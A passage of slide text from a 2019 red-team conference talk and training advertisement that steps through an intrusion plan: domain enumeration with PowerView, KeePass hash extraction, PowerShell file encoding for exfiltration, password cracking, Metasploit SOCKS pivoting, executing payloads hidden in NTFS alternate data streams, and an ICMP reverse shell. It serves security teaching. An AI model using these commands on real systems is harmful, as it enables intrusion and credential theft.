  • 29. Information Gathering PowerView • Part of the PowerSploit package https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon OR, for the latest version 3 (development) version https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 • PowerShell script that provides numerous functions for situational awareness and domain enumeration • A great ‘cheatsheet’ on functions and usage by @harmj0y https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 • Functions include: Get-DomainUser, Get-DomainGroup, Get-DomainGroupMember Get-NetDomain, Get-DomainPolicy, Get-DomainTrust, Get-DomainComputer, Find-DomainShare + LOADS more © in.security Ltd 2019, all rights reserved
  • 30. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Enumeration]
  • 31. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 32. Password Managers - KeePass © in.security Ltd 2019, all rights reserved • Password managers/vaults are often used to store privileged credentials and information • KeePass uses .kdb files (v1) and .kdbx files (v2) to store the database • We can’t just give the file to a password cracker so we need to extract the hash • keepass2john can do this and it comes shipped with Kali • We could then either install KeePass and load the database, or access directly over the command line using a tool like kpcli
  • 33. How Can We Exfil The DataZ? © in.security Ltd 2019, all rights reserved Transferring files using PowerShell $FileName = “<target_file>” $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName)) ReadAllBytes – Opens a binary file, reads the contents into a byte array and closes the file* * https://docs.microsoft.com/en-us/dotnet/api/system.io.file.readallbytes
  • 34. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Exfiltration]
  • 35. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 36. Offline Password Cracking Success depends on a number of factors • Algorithm complexity • Password length / complexity • Hardware (GPU/FPGA/ASIC) Password cracking process • Hash the clear text candidate • Compare to stolen hash • No match? Start again • Match = Win! © in.security Ltd 2019, all rights reserved
  • 37. Brute Force Attack © in.security Ltd 2019, all rights reserved • Try every possible combination of every character • Not used 99% of the time… Pros • 100% GUARANTEED to crack Cons • You likely won’t be around to see it happen!
  • 38. Brute Force Attack • Key space = char set ^ length • 8x NVIDIA GTX 1080 Ti GPUs - Windows passwords @ 513 GH/s* (full 95 char set) • 8 char NTLM = 3.5 hours • 9 char NTLM = 14 days • 10 char NTLM = 3.7 years • 11 char NTLM = 351 years • 12 char NTLM = 33,401 years • 13 char NTLM = 3.2 million years © in.security Ltd 2019, all rights reserved *h:ps://gist.github.com/epixoip/ace60d09981be09544fdd35005051505
  • 39. Dictionary Attack © in.security Ltd 2019, all rights reserved Wordlist Rules insecurity Insecurity Password 1nsecurity monkey ins3curity! 1234567 Ins3cur1ty Qwerty in53cur!ty letmein • Wordlist contains password candidates • Most commonly used • Can be mangled with rules Pros • Wordlists contain common passwords • Mangling addresses the human element Cons • Only as good as your dictionary/rules
  • 40. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Cracking]
  • 41. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 42. Routing in Metasploit • Traffic to target networks can be routed over existing sessions… • To add a route route add <$network> <$mask> <$sessionID> © in.security Ltd 2019, all rights reserved
  • 43. SOCKS Proxies • A server that can establish a connection to a destination on behalf of a client • Metasploit SOCKS modules auxiliary/server/socks4a auxiliary/server/socks5 ”This module provides a socksx proxy server that uses the built-in Metasploit routing to relay connections” * • This functionality allows programs external to Metasploit, to utilise configured routes within msf and gain access to the target system(s)/network(s) …with the help of proxychains © in.security Ltd 2019, all rights reserved
  • 44. SOCKS Proxies & Proxychains • Proxychains / http://proxychains.sourceforge.net • Allows/supports TCP (not UDP - with the exception of DNS) • Used to allow *any program to run through a SOCKS proxy • Configuration file @ /etc/proxychains.conf • Then run a program through the proxy! proxychains smbclient -W insec-xxxx.local //10.133.50.xxx/<$fileshare> -U <$targetUser>%<$password> © in.security Ltd 2019, all rights reserved
  • 45. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [SOCKS & Shellz]
  • 46. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 47. Hiding Data • Alternate Data Streams (ADS) allow one file system entry to contain multiple data sets (NTFS only) • Original file is always the ‘main’ stream, additional streams are appended to filename and are colon delimited File.txt File.txt:secretdata.txt:$DATA File.txt:shell.exe:$DATA • One option to trigger – wmic process call create File.txt:shell.exe • A nice article by Oddvar Moe on executing files from ADS https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ © in.security Ltd 2019, all rights reserved
  • 48. Exfiltrating Data Over ICMP © in.security Ltd 2019, all rights reserved • ICMP doesn’t use ports (types) and is often left enabled, forgotten and not monitored • Overcomes network egress issues when usual channels are blocked • icmpsh is a reverse ICMP shell (https://github.com/inquisb/icmpsh) • Server works in C, Perl, Python • Client is Win32 • We have to disable ICMP replies from the attacking host and then start the ICMP server sysctl -w net.ipv4.icmp_echo_ignore_all=1
  • 49. Our 45min-ish Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [ADS & OOB ICMP… If time persists!]
  • 50. Our 45min Pwnage Plan… Phish Kibana Phish#2 Enumeration Exfiltration Password Cr@cK5 SOCKS Proxies OOB Persistence © in.security Ltd 2019, all rights reserved
  • 51. Our 45min Pwnage Plan… </DEMO> © in.security Ltd 2019, all rights reserved
  • 52. Much, Much More… © in.security Ltd 2019, all rights reserved June 6th/7th @44CON h9ps://44con.com/44con-training/hacking-enterprises-exploiCng-insecurity/